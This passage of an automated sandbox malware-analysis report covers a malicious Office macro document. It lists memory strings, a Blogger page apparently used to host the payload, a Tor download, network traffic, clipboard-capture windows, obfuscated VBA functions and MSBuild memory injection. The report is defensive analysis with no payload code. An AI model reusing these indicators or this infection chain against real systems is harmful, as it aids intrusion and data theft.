Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlH
Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlgspo
Source: mshta.exe, 00000006.00000003.2241524951.000000000306E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758
Source: mshta.exe, 00000006.00000003.2251330504.0000000003472000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758&blogs
Source: mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=87921133286965707584.0E)
Source: mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758QV
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9116518222795791100&zx=6c18238f-a
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2264656702.0000000005790000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9116518222795791100&zx=6c18238f-a384-
Source: mshta.exe, 00000006.00000003.2250723670.000000000341C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/feeds/9116518222795791100/posts/default
Source: mshta.exe, 00000006.00000003.2235127102.000000000340C000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/adspersonalization
Source: mshta.exe, 00000006.00000003.2225510825.000000000347F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/blogspot-cookies
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzz
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicy
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devapi
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devforum
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/discuss
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/helpcenter
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/privacy
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/terms
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/tutorials
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221525300.0000000005919000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.png
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pnga
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngcomment_from_post_iframe.jspng
Source: mshta.exe, 00000006.00000003.2264609291.00000000057CD000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngmple/gradients_light.pngight.pngom%2Fp%2Fst2222.ht
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngv
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngx
Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/page-edit.g?blogID=9116518222795791100&pageID=8792113328696570758&from=penci
Source: mshta.exe, 00000006.00000003.2259640260.0000000003069000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/rpc_relay.html
Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=bl
Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=em
Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=fa
Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=pi
Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=tw
Source: mshta.exe, 00000006.00000003.2253117052.0000000002DF1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262558923.000000000012E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242550287.00000000075DE000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/2036001057-lbx__en_gb.js
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250247675.000000000044A000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js
Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js.blogspot.com%2Fp%2Fst2222.
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsC:
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsT
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsn
Source: mshta.exe, 00000006.00000003.2250247675.000000000044A000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3767
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.js
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.js.cssmV
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js06G
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.jsET4.0C;
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssG
Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssjigi123.blogspot.com%2Fp%2Fst2222.
Source: mshta.exe, 00000006.00000003.2253117052.0000000002DF1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262558923.000000000012E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242550287.00000000075DE000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/v-css/368954415-lightbox_bundle.css
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css
Source: mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.cssEV
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.cssQV
Source: mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.csscV
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221581590.0000000003B5D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.js
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.jsY
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.jseflate
Source: mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246295022.0000000005886000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/unvisited-link-
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsZ
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsal
Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.jsttps%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222.
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/s
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/
Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/CO
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.css
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.cssM
Source: mshta.exe, 00000006.00000002.2309877256.00000000080A2000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/css/maia.cssg
Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/css/maia.cssgspotURL=https%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222.
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svg
Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg
Source: mshta.exe, 00000006.00000003.2264365340.0000000005775000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png)
Source: mshta.exe, 00000006.00000003.2261840668.00000000075DE000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/search_black_24dp.png
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.TCoB7ee77HA.O/rt=j/m=q_d
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.1KF06_f2niE.L.X.O/m=qawd
Source: powershell.exe, 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49204
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49200
Source: unknown Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown Network traffic detected: HTTP traffic on port 49200 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown Network traffic detected: HTTP traffic on port 49204 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49206 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49195 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49193 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49210 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49215
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49213
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49210
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49193
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown Network traffic detected: HTTP traffic on port 49208 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49213 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49208
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49206
Source: unknown Network traffic detected: HTTP traffic on port 49215 -> 443
Source: unknown HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknown HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknown HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49192 version: TLS 1.2
Source: unknown HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49200 version: TLS 1.2
Source: unknown HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49208 version: TLS 1.2
Source: unknown HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49213 version: TLS 1.2
Source: unknown HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49215 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

System Summary:

.NET source code contains very large array initializations
Source: 29.2.MSBuild.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bE0F986DBu002d41FAu002d48F8u002d8F63u002d63B8796C3D6Fu007d/u0030691DBC7u002d6A15u002d4BCCu002dB997u002d853341EE6FA4.cs Large array initialization: .cctor: array initializer size 12059
Document contains an embedded VBA with base64 encoded strings
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function nQedtxArQgZ, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function PvrrqugmtK, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function aaBJQySxVnzo, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function QAPwCVeTzuvty, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function QAPwCVeTzuvty, String MyORUMlOteZN
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function hHvsmECZuS, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function hHvsmECZuS, String MyORUMlOteZN
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function hHvsmECZuS, String SoqzJEixPkDxnScc
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function SADYAESdyLyl, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function SADYAESdyLyl, String MyORUMlOteZN
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function SADYAESdyLyl, String SoqzJEixPkDxnScc
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function SADYAESdyLyl, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String MyORUMlOteZN
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String SoqzJEixPkDxnScc
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function YqawgrxtEVk, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function YqawgrxtEVk, String MyORUMlOteZN
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function YqawgrxtEVk, String SoqzJEixPkDxnScc
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function YqawgrxtEVk, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String MyORUMlOteZN
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String SoqzJEixPkDxnScc
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String MyORUMlOteZN
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String SoqzJEixPkDxnScc
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String MyORUMlOteZN
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String SoqzJEixPkDxnScc
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function piRACQzERc, String zEROxKkkLThIdHgxYyJD
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function piRACQzERc, String MyORUMlOteZN
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function piRACQzERc, String SoqzJEixPkDxnScc
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function piRACQzERc, String umiuKavjsPKoqQrwEtZi
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function decrypt, String yqPfQprLotGR
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function decrypt, String yqPfQprLotGR
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function decrypt, String yqPfQprLotGR
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_003FB2EE NtQuerySystemInformation, 12_2_003FB2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_003FB2CC NtQuerySystemInformation, 12_2_003FB2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_01D9B2EE NtQuerySystemInformation, 24_2_01D9B2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_01D9B2CC NtQuerySystemInformation, 24_2_01D9B2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CEB2EE NtQuerySystemInformation, 33_2_01CEB2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CEB2CC NtQuerySystemInformation, 33_2_01CEB2CC
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_02A518A8 12_2_02A518A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_02A574B7 12_2_02A574B7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_02A51897 12_2_02A51897
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_02A574C8 12_2_02A574C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_02A5618D 12_2_02A5618D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_02A51538 12_2_02A51538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_02A51548 12_2_02A51548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_02871897 24_2_02871897
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_028718A8 24_2_028718A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_028774B7 24_2_028774B7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_028774C8 24_2_028774C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_02871538 24_2_02871538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_02871548 24_2_02871548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_001E6020 29_2_001E6020
